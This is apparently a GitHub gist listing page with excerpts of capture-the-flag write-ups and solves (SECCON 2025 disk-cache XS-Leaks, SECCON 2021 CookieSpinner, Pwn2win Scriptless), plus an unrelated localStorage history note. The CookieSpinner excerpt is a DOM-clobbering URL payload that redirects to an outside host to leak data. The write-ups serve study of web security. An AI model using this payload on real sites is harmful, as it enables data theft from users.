Takeshi Kaneko arkark

@parrot409
parrot409 / _writeup.md
Last active December 30, 2025 06:29
Impossible Leak - SECCON 2025 Quals

XS Leaks using disk cache grooming

The admin bot creates a new browsing context with createBrowsingContext() and uses that to create a page. Each browsing context should have a dedicated disk cache, but how does Chrome handle this? I deduced that it uses an in-memory disk cache and it's much smaller than the default on-disk disk cache. The incognito tab of my browser has the same behavior.

The following page alerts "not cached" due to a cache miss in incognito mode, but no error happens in a regular tab.

$ head /dev/urandom -c 5242880 > chunk
$ cat <<EOF > index.html
@po6ix
po6ix / CookieSpinner.md
Last active December 12, 2021 14:34
SECCON CTF 2021
http://web:3000/?window=parentNode&?window=parentNode&view=%3Cform+id=parentNode+name=parentNode%3E%3Cinput+id=parentNode%3E%3C/form%3E%3Ca+id=parentNode+name=location+href=%22http://p6.is:1234?%22%3E%3C/a%3E%3Cx%20i=%22
@terjanq
terjanq / scriptless_solve.html
Last active June 13, 2020 19:30
Solution to Scriptless challenge from Pwn2win 2020 CTF
<body>
</body>
<script>
/*
Quasi-scriptless (3 solves)
@paulirish
paulirish / gist:5558557
Last active February 26, 2025 18:07
a brief history of detecting local storage

A timeline of the last four years of detecting good old window.localStorage.


Jan Lenhart, bless his heart, contributed the first patch for support:

October 2009: 5059daa